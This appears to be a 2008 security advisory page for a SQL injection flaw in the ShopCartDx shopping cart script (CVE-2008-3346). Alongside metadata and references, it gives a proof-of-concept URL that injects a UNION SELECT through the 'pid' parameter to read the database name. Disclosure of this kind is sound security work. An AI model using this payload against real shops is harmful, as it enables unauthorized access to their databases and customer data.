|
|
| Details : SecurityAlert |
|
|
Topic : | ShopCartDx 4.30 (pid) Remote SQL Injection Vulnerability
|
SecurityAlert : 4045
CVE : CVE-2008-3346
CWE : CWE-89
SecurityRisk : High (About)
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Given : No
Credit : Cr@zy_King
Published : 30.07.2008
Affected Software : | E-topbiz, Shopcart_dx |
 Advisory Text : ShopcartDX Remote Sql Injection All Version
By Cr@zy_King / sqL Lov3r'Z Crew Co. 2008
Downlod:
http://webscripts.softpedia.com/script/E-Commerce/Shopping-Carts/ShopcartDX
-1-1421.html
Sql :
http://localhost/patch/product_detail.php?cid=9&pid=-1 UNION SELECT
1,2,3,4,database(),6,7,8,9,10,11,12,13,14,15,16/*
Greatz : aLL My Friend'Z and str0ke
========================================From
Turkey=============================================
References :
http://www.milw0rm.com/exploits/6114
http://secunia.com/advisories/31156
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|
|
|
|